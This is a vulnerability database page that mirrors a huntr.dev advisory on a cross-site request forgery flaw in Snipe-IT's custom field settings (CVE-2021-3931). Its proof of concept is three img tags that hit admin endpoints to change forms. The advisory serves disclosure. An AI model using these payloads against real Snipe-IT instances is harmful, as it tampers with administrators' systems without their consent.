Cross-Site Request Forgery (CSRF) in snipe/snipe-it - vulnerability database | Vulners.com
Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrHaxatron03B21D69-3BF5-4B2F-A2CF-872DD677A68F
HistoryNov 04, 2021 - 2:01 p.m.

Cross-Site Request Forgery (CSRF) in snipe/snipe-it

2021-11-0414:01:54
haxatron
www.huntr.dev
7
csrf
vulnerability
snipe/snipe-it
custom field settings
trick admin user
modify forms

EPSS

0.001

Percentile

31.0%

JSON

Description

CSRF in custom field settings

Proof of Concept

<img src="http://&lt;SNIPE_IT_APP&gt;/fields/1/fieldset/1/disassociate">
<img src="http://&lt;SNIPE_IT_APP&gt;/fields/required/3/3">
<img src="http://&lt;SNIPE_IT_APP&gt;/fields/optional/3/3">

Impact

This vulnerability is capable of trick admin user to modify custom forms

Related

prion 1
osv 2
github 1
cnvd 1
cvelist 1
nvd 1
cve 1
prion
prion
Cross site request forgery (csrf)
2021-11-13 09:15:00
osv
osv
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:19:09
CVE-2021-3931
2021-11-13 09:15:06
github
github
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)
2021-11-15 23:19:09
cnvd
cnvd
Snipe-IT Cross-site Request Forgery Vulnerability
2021-11-16 00:00:00
cvelist
cvelist
CVE-2021-3931 Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2021-11-13 08:50:10
nvd
nvd
CVE-2021-3931
2021-11-13 09:15:06
cve
cve
CVE-2021-3931
2021-11-13 09:15:06

EPSS

0.001

Percentile

31.0%

JSON
Related for 03B21D69-3BF5-4B2F-A2CF-872DD677A68F
prion1osv2github1cnvd1cvelist1nvd1cve1